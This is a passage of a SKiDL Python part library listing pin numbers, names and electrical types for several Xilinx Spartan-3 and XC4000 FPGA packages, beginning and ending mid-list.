Pin(num='H2',name='VCCO3',func=Pin.PWRIN,do_erc=True),
Pin(num='J2',name='IO_L14P_3/LHCLK4',func=Pin.BIDIR,do_erc=True),
Pin(num='K2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='L2',name='IO_L16N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='M2',name='VCCO3',func=Pin.PWRIN,do_erc=True),
Pin(num='N2',name='IO_L22P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='P2',name='IO_L23N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='R2',name='IO_L02P_2/M2',func=Pin.BIDIR,do_erc=True),
Pin(num='T2',name='IO_L02N_2/CSO_B',func=Pin.BIDIR,do_erc=True),
Pin(num='A3',name='IO_L19P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B3',name='IO_L19N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C3',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='D3',name='IO_L02N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='E3',name='IO_L05P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='F3',name='IO_L07P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='G3',name='IO_L09P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='H3',name='IO_L12P_3/LHCLK2',func=Pin.BIDIR,do_erc=True),
Pin(num='J3',name='IO_L12N_3/IRDY2/LHCLK3',func=Pin.BIDIR,do_erc=True),
Pin(num='K3',name='IO_L15P_3/TRDY2/LHCLK6',func=Pin.BIDIR,do_erc=True),
Pin(num='L3',name='IO_L18N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='M3',name='IO_L19P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='N3',name='IO_L24P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='P3',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='R3',name='IO_L03P_2/RDWR_B',func=Pin.BIDIR,do_erc=True),
Pin(num='T3',name='IO_L03N_2/VS2',func=Pin.BIDIR,do_erc=True),
Pin(num='A4',name='IO_L18P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B4',name='IO_L18N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C4',name='IO_L20P_0/VREF_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D4',name='IO_L02P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='E4',name='IP_L04P_3',do_erc=True),
Pin(num='F4',name='IP_L04N_3/VREF_3',do_erc=True),
Pin(num='G4',name='IO_L07N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='H4',name='IO_L09N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='J4',name='IO_L17P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='K4',name='IO_L18P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='L4',name='IO_L19N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='M4',name='IO_L24N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='N4',name='IO_L01P_2/M1',func=Pin.BIDIR,do_erc=True),
Pin(num='P4',name='IO_L01N_2/M0',func=Pin.BIDIR,do_erc=True),
Pin(num='R4',name='VCCO2',func=Pin.PWRIN,do_erc=True),
Pin(num='T4',name='IO_L05P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='A5',name='IO_L17P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B5',name='VCCO0',func=Pin.PWRIN,do_erc=True),
Pin(num='C5',name='IO_L17N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D5',name='IO_L20N_0/PUDC_B',func=Pin.BIDIR,do_erc=True),
Pin(num='E5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='F5',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='G5',name='IP_L06N_3/VREF_3',do_erc=True),
Pin(num='H5',name='IO_L10N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='J5',name='VCCO3',func=Pin.PWRIN,do_erc=True),
Pin(num='K5',name='IP_L21P_3',do_erc=True),
Pin(num='L5',name='IP_L25P_3',do_erc=True),
Pin(num='M5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='N5',name='IP_2/VREF_2',do_erc=True),
Pin(num='P5',name='IO_L04N_2/VS0',func=Pin.BIDIR,do_erc=True),
Pin(num='R5',name='IO_L05N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='T5',name='IO_L06P_2/D7',func=Pin.BIDIR,do_erc=True),
Pin(num='A6',name='IO_L15P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B6',name='IO_L15N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C6',name='IO_L16N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D6',name='IP_0',do_erc=True),
Pin(num='E6',name='IP_0',do_erc=True),
Pin(num='F6',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='G6',name='IP_L06P_3',do_erc=True),
Pin(num='H6',name='IO_L10P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='J6',name='IO_L17N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='K6',name='IP_L21N_3',do_erc=True),
Pin(num='L6',name='IP_L25N_3/VREF_3',do_erc=True),
Pin(num='M6',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='N6',name='IO_L04P_2/VS1',func=Pin.BIDIR,do_erc=True),
Pin(num='P6',name='IO_L07N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='R6',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='T6',name='IO_L06N_2/D6',func=Pin.BIDIR,do_erc=True),
Pin(num='A7',name='IO_L13P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='C7',name='IO_L13N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D7',name='IO_L16P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='E7',name='IO_L14N_0/VREF_0',func=Pin.BIDIR,do_erc=True),
Pin(num='F7',name='IP_0',do_erc=True),
Pin(num='G7',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='H7',name='IP_L13P_3',do_erc=True),
Pin(num='J7',name='IP_L13N_3',do_erc=True),
Pin(num='K7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='L7',name='IP_2',do_erc=True),
Pin(num='M7',name='IP_2/VREF_2',do_erc=True),
Pin(num='N7',name='IO_L07P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='P7',name='IO_L08P_2/D5',func=Pin.BIDIR,do_erc=True),
Pin(num='R7',name='IO_L09P_2/GCLK12',func=Pin.BIDIR,do_erc=True),
Pin(num='T7',name='IO_L09N_2/GCLK13',func=Pin.BIDIR,do_erc=True),
Pin(num='A8',name='IO_L12P_0/GCLK10',func=Pin.BIDIR,do_erc=True),
Pin(num='B8',name='IO_L12N_0/GCLK11',func=Pin.BIDIR,do_erc=True),
Pin(num='C8',name='IO_L11P_0/GCLK8',func=Pin.BIDIR,do_erc=True),
Pin(num='D8',name='IO_L11N_0/GCLK9',func=Pin.BIDIR,do_erc=True),
Pin(num='E8',name='VCCO0',func=Pin.PWRIN,do_erc=True),
Pin(num='F8',name='IO_L14P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='G8',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='H8',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='J8',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='K8',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='L8',name='IP_2',do_erc=True),
Pin(num='M8',name='IP_2/VREF_2',do_erc=True),
Pin(num='N8',name='IO_L08N_2/D4',func=Pin.BIDIR,do_erc=True),
Pin(num='P8',name='IO_L10P_2/GCLK14',func=Pin.BIDIR,do_erc=True),
Pin(num='R8',name='VCCO2',func=Pin.PWRIN,do_erc=True),
Pin(num='T8',name='IO_L10N_2/GCLK15',func=Pin.BIDIR,do_erc=True),
Pin(num='A9',name='IO_L10N_0/GCLK7',func=Pin.BIDIR,do_erc=True),
Pin(num='B9',name='VCCO0',func=Pin.PWRIN,do_erc=True),
Pin(num='C9',name='IO_L10P_0/GCLK6',func=Pin.BIDIR,do_erc=True),
Pin(num='D9',name='IO_L09N_0/GCLK5',func=Pin.BIDIR,do_erc=True),
Pin(num='E9',name='IP_0/VREF_0',do_erc=True),
Pin(num='F9',name='IP_0',do_erc=True),
Pin(num='G9',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='H9',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='J9',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='K9',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='L9',name='IP_2/VREF_2',do_erc=True),
Pin(num='M9',name='VCCO2',func=Pin.PWRIN,do_erc=True),
Pin(num='N9',name='IO_L11P_2/GCLK0',func=Pin.BIDIR,do_erc=True),
Pin(num='P9',name='IO_L11N_2/GCLK1',func=Pin.BIDIR,do_erc=True),
Pin(num='R9',name='IO_L12P_2/GCLK2',func=Pin.BIDIR,do_erc=True),
Pin(num='T9',name='IO_L12N_2/GCLK3',func=Pin.BIDIR,do_erc=True),
Pin(num='A10',name='IO_L08N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B10',name='IO_L08P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C10',name='IO_L09P_0/GCLK4',func=Pin.BIDIR,do_erc=True),
Pin(num='D10',name='IO_L06P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='E10',name='IO_L06N_0/VREF_0',func=Pin.BIDIR,do_erc=True),
Pin(num='F10',name='IP_0',do_erc=True),
Pin(num='G10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='H10',name='IP_L13P_1',do_erc=True),
Pin(num='J10',name='IP_L09P_1/VREF_1',do_erc=True),
Pin(num='K10',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='L10',name='IP_2/VREF_2',do_erc=True),
Pin(num='M10',name='IO_L13N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='N10',name='IO_L13P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='P10',name='IO_L14N_2/MOSI/CSI_B',func=Pin.BIDIR,do_erc=True),
Pin(num='R10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='T10',name='IO_L14P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='A11',name='IO_L07N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='C11',name='IO_L07P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D11',name='IO_L03N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='E11',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='F11',name='IP_L25N_1',do_erc=True),
Pin(num='G11',name='IP_L21N_1',do_erc=True),
Pin(num='H11',name='IP_L13N_1',do_erc=True),
Pin(num='J11',name='IP_L09N_1',do_erc=True),
Pin(num='K11',name='IP_L04P_1',do_erc=True),
Pin(num='L11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='M11',name='IP_2/VREF_2',do_erc=True),
Pin(num='N11',name='IO_L16N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='P11',name='IO_L16P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='R11',name='IO_L15N_2/DOUT',func=Pin.BIDIR,do_erc=True),
Pin(num='T11',name='IO_L15P_2/AWAKE',func=Pin.BIDIR,do_erc=True),
Pin(num='A12',name='IO_L05N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B12',name='IO_L05P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C12',name='IO_L03P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D12',name='IP_0',do_erc=True),
Pin(num='E12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='F12',name='IP_L25P_1/VREF_1',do_erc=True),
Pin(num='G12',name='IP_L21P_1/VREF_1',do_erc=True),
Pin(num='H12',name='VCCO1',func=Pin.PWRIN,do_erc=True),
Pin(num='J12',name='IO_L10P_1/A8',func=Pin.BIDIR,do_erc=True),
Pin(num='K12',name='IP_L04N_1/VREF_1',do_erc=True),
Pin(num='L12',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='M12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='N12',name='IO_L19P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='P12',name='IO_L17N_2/D3',func=Pin.BIDIR,do_erc=True),
Pin(num='R12',name='VCCO2',func=Pin.PWRIN,do_erc=True),
Pin(num='T12',name='IO_L17P_2/INIT_B',func=Pin.BIDIR,do_erc=True),
Pin(num='A13',name='IO_L04N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B13',name='VCCO0',func=Pin.PWRIN,do_erc=True),
Pin(num='C13',name='IO_L01N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D13',name='IO_L01P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='E13',name='IO_L23P_1/A22',func=Pin.BIDIR,do_erc=True),
Pin(num='F13',name='IO_L20N_1/A19',func=Pin.BIDIR,do_erc=True),
Pin(num='G13',name='IO_L19P_1/A16',func=Pin.BIDIR,do_erc=True),
Pin(num='H13',name='IO_L17P_1/A12',func=Pin.BIDIR,do_erc=True),
Pin(num='J13',name='IO_L10N_1/A9',func=Pin.BIDIR,do_erc=True),
Pin(num='K13',name='IO_L06N_1/A3',func=Pin.BIDIR,do_erc=True),
Pin(num='L13',name='IO_L06P_1/A2',func=Pin.BIDIR,do_erc=True),
Pin(num='M13',name='IO_L05P_1',func=Pin.BIDIR,do_erc=True),
Pin(num='N13',name='IO_L01P_1/HDC',func=Pin.BIDIR,do_erc=True),
Pin(num='P13',name='IO_L19N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='R13',name='IO_L18N_2/D1',func=Pin.BIDIR,do_erc=True),
Pin(num='T13',name='IO_L18P_2/D2',func=Pin.BIDIR,do_erc=True),
Pin(num='A14',name='IO_L04P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B14',name='IO_L02N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C14',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='D14',name='IO_L23N_1/A23',func=Pin.BIDIR,do_erc=True),
Pin(num='E14',name='IO_L20P_1/A18',func=Pin.BIDIR,do_erc=True),
Pin(num='F14',name='IO_L19N_1/A17',func=Pin.BIDIR,do_erc=True),
Pin(num='G14',name='IO_L17N_1/A13',func=Pin.BIDIR,do_erc=True),
Pin(num='H14',name='IO_L14N_1/RHCLK5',func=Pin.BIDIR,do_erc=True),
Pin(num='J14',name='IO_L14P_1/RHCLK4',func=Pin.BIDIR,do_erc=True),
Pin(num='K14',name='IO_L11N_1/RHCLK1',func=Pin.BIDIR,do_erc=True),
Pin(num='L14',name='IO_L08P_1/A6',func=Pin.BIDIR,do_erc=True),
Pin(num='M14',name='IO_L05N_1/VREF_1',func=Pin.BIDIR,do_erc=True),
Pin(num='N14',name='IO_L01N_1/LDC2',func=Pin.BIDIR,do_erc=True),
Pin(num='P14',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='R14',name='IO_L20N_2/CCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='T14',name='IO_L20P_2/D0/DIN/MISO',func=Pin.BIDIR,do_erc=True),
Pin(num='A15',name='TCK',do_erc=True),
Pin(num='B15',name='IO_L02P_0/VREF_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C15',name='IO_L24N_1/A25',func=Pin.BIDIR,do_erc=True),
Pin(num='D15',name='IO_L22N_1/A21',func=Pin.BIDIR,do_erc=True),
Pin(num='E15',name='VCCO1',func=Pin.PWRIN,do_erc=True),
Pin(num='F15',name='IO_L18N_1/A15',func=Pin.BIDIR,do_erc=True),
Pin(num='G15',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='H15',name='IO_L15P_1/IRDY1/RHCLK6',func=Pin.BIDIR,do_erc=True),
Pin(num='J15',name='VCCO1',func=Pin.PWRIN,do_erc=True),
Pin(num='K15',name='IO_L11P_1/RHCLK0',func=Pin.BIDIR,do_erc=True),
Pin(num='L15',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='M15',name='IO_L07P_1/A4',func=Pin.BIDIR,do_erc=True),
Pin(num='N15',name='VCCO1',func=Pin.PWRIN,do_erc=True),
Pin(num='P15',name='IO_L02N_1/LDC0',func=Pin.BIDIR,do_erc=True),
Pin(num='R15',name='IO_L02P_1/LDC1',func=Pin.BIDIR,do_erc=True),
Pin(num='T15',name='DONE',func=Pin.BIDIR,do_erc=True),
Pin(num='A16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='B16',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='C16',name='IO_L24P_1/A24',func=Pin.BIDIR,do_erc=True),
Pin(num='D16',name='IO_L22P_1/A20',func=Pin.BIDIR,do_erc=True),
Pin(num='E16',name='IO_L18P_1/A14',func=Pin.BIDIR,do_erc=True),
Pin(num='F16',name='IO_L16N_1/A11',func=Pin.BIDIR,do_erc=True),
Pin(num='G16',name='IO_L16P_1/A10',func=Pin.BIDIR,do_erc=True),
Pin(num='H16',name='IO_L15N_1/RHCLK7',func=Pin.BIDIR,do_erc=True),
Pin(num='J16',name='IO_L12N_1/TRDY1/RHCLK3',func=Pin.BIDIR,do_erc=True),
Pin(num='K16',name='IO_L12P_1/RHCLK2',func=Pin.BIDIR,do_erc=True),
Pin(num='L16',name='IO_L08N_1/A7',func=Pin.BIDIR,do_erc=True),
Pin(num='M16',name='IO_L07N_1/A5',func=Pin.BIDIR,do_erc=True),
Pin(num='N16',name='IO_L03N_1/A1',func=Pin.BIDIR,do_erc=True),
Pin(num='P16',name='IO_L03P_1/A0',func=Pin.BIDIR,do_erc=True),
Pin(num='R16',name='SUSPEND',do_erc=True),
Pin(num='T16',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='XC3S400-FG320',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC3S400-PQ208',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC3S50-VQ100',dest=TEMPLATE,tool=SKIDL,keywords='FPGA',description='spartan 2',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='IO-VRN',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='IO-VRP',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='VCCO_7',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='VCCAUX(2.5V)',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='20',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='30',name='IO/D7',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='IO/DOUT/BUSY',func=Pin.BIDIR,do_erc=True),
Pin(num='60',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='80',name='IO-VRP',func=Pin.BIDIR,do_erc=True),
Pin(num='90',name='IO/GCK7',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='VCCO_5',func=Pin.PWRIN,do_erc=True),
Pin(num='41',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='51',name='DONE',func=Pin.OPENCOLL,do_erc=True),
Pin(num='61',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='81',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='91',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='IO-VRN',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='IO/D6',func=Pin.BIDIR,do_erc=True),
Pin(num='42',name='IO/INIT',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='CCLK',do_erc=True),
Pin(num='62',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='72',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='82',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='92',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='IO-VREF',do_erc=True),
Pin(num='23',name='IO-VRP',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='VCCAUX(2.5V)',func=Pin.PWRIN,do_erc=True),
Pin(num='43',name='IO/D3',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='IO-VRN',func=Pin.BIDIR,do_erc=True),
Pin(num='63',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='83',name='VCCO_1',func=Pin.PASSIVE,do_erc=True),
Pin(num='93',name='VCCINT(1.2V)',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='M1',do_erc=True),
Pin(num='34',name='IO/D5',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='IO/D2',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='IO-VRP',func=Pin.BIDIR,do_erc=True),
Pin(num='64',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='74',name='IO-VRN',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='VCCAUX(2.5V)',func=Pin.PWRIN,do_erc=True),
Pin(num='94',name='VCCO_0',func=Pin.PASSIVE,do_erc=True),
Pin(num='15',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='M0',do_erc=True),
Pin(num='35',name='IO/D4',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='VCCINT(1.2V)',func=Pin.PWRIN,do_erc=True),
Pin(num='55',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='65',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='75',name='IO-VRP',func=Pin.BIDIR,do_erc=True),
Pin(num='85',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='95',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='26',name='M2',do_erc=True),
Pin(num='36',name='IO/GCK2',func=Pin.BIDIR,do_erc=True),
Pin(num='46',name='VCCO_4',func=Pin.PWRIN,do_erc=True),
Pin(num='66',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='76',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='86',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='96',name='IO-VRN',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='IO/CS',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='IO/GCK3',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='IO/D1',func=Pin.BIDIR,do_erc=True),
Pin(num='57',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='67',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='TCK',do_erc=True),
Pin(num='87',name='IO/GCLK4',func=Pin.BIDIR,do_erc=True),
Pin(num='97',name='IO-VRP',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='VCCINT(1.2V)',func=Pin.PWRIN,do_erc=True),
Pin(num='28',name='IO/RDWR',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='IO/GCK0',func=Pin.BIDIR,do_erc=True),
Pin(num='48',name='IO/D0/DIN',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='VCCAUX(2.5V)',func=Pin.PWRIN,do_erc=True),
Pin(num='68',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='TMS',do_erc=True),
Pin(num='88',name='IO/GCLK5',func=Pin.BIDIR,do_erc=True),
Pin(num='98',name='HSWAP_EN',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='VCCO_6',func=Pin.PWRIN,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='39',name='IO/GCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='69',name='VCCINT(1.2V)',func=Pin.PWRIN,do_erc=True),
Pin(num='79',name='IO-VRN',func=Pin.BIDIR,do_erc=True),
Pin(num='89',name='IO/GCK6',func=Pin.BIDIR,do_erc=True),
Pin(num='99',name='PROG',do_erc=True),
Pin(num='100',name='TDI',do_erc=True)]),
Part(name='XC3S50AN/TQG144',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC4003-PC84',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['XC4005-PC84']),
Part(name='XC4003-VQ100',dest=TEMPLATE,tool=SKIDL,ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='PGCK1',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='P/A17',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='P/TDI',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='P/TCK',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='P/A3',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='P7',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='P8',func=Pin.PASSIVE,do_erc=True),
Pin(num='9',name='P/A15',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='P/A4',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='P20',func=Pin.PASSIVE,do_erc=True),
Pin(num='30',name='P/LDC',func=Pin.PASSIVE,do_erc=True),
Pin(num='40',name='P40',func=Pin.PASSIVE,do_erc=True),
Pin(num='50',name='DONE',func=Pin.OPENCOLL,do_erc=True),
Pin(num='60',name='P60',func=Pin.PASSIVE,do_erc=True),
Pin(num='70',name='P70',func=Pin.PASSIVE,do_erc=True),
Pin(num='80',name='P80',func=Pin.PASSIVE,do_erc=True),
Pin(num='90',name='P90',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='SGCK2',func=Pin.PASSIVE,do_erc=True),
Pin(num='31',name='P31',func=Pin.PASSIVE,do_erc=True),
Pin(num='41',name='P41',func=Pin.PASSIVE,do_erc=True),
Pin(num='51',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='61',name='P61',func=Pin.PASSIVE,do_erc=True),
Pin(num='71',name='P71/RDY',func=Pin.PASSIVE,do_erc=True),
Pin(num='81',name='P81',func=Pin.PASSIVE,do_erc=True),
Pin(num='91',name='P91',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='M1/RD',do_erc=True),
Pin(num='32',name='P32',func=Pin.PASSIVE,do_erc=True),
Pin(num='42',name='P42',func=Pin.PASSIVE,do_erc=True),
Pin(num='52',name='PROG',do_erc=True),
Pin(num='62',name='P62',func=Pin.PASSIVE,do_erc=True),
Pin(num='72',name='DIN',func=Pin.PASSIVE,do_erc=True),
Pin(num='82',name='P82',func=Pin.PASSIVE,do_erc=True),
Pin(num='92',name='P92',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='P13',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='33',name='P33',func=Pin.PASSIVE,do_erc=True),
Pin(num='43',name='P43',func=Pin.PASSIVE,do_erc=True),
Pin(num='53',name='P53',func=Pin.BIDIR,do_erc=True),
Pin(num='63',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='73',name='DOUT/SGCK4',func=Pin.PASSIVE,do_erc=True),
Pin(num='83',name='P83',func=Pin.PASSIVE,do_erc=True),
Pin(num='93',name='P93',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='P14',func=Pin.PASSIVE,do_erc=True),
Pin(num='24',name='M0/RT',do_erc=True),
Pin(num='34',name='P34',func=Pin.PASSIVE,do_erc=True),
Pin(num='44',name='P44',func=Pin.PASSIVE,do_erc=True),
Pin(num='54',name='PGCK3',func=Pin.BIDIR,do_erc=True),
Pin(num='64',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='74',name='CCLK',do_erc=True),
Pin(num='84',name='P84',func=Pin.PASSIVE,do_erc=True),
Pin(num='94',name='P94',func=Pin.PASSIVE,do_erc=True),
Pin(num='15',name='P15',func=Pin.PASSIVE,do_erc=True),
Pin(num='25',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='35',name='P35',func=Pin.PASSIVE,do_erc=True),
Pin(num='45',name='P45',func=Pin.PASSIVE,do_erc=True),
Pin(num='55',name='P55',func=Pin.PASSIVE,do_erc=True),
Pin(num='65',name='P65',func=Pin.PASSIVE,do_erc=True),
Pin(num='75',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='85',name='P85',func=Pin.PASSIVE,do_erc=True),
Pin(num='95',name='P91',func=Pin.PASSIVE,do_erc=True),
Pin(num='16',name='P16',func=Pin.PASSIVE,do_erc=True),
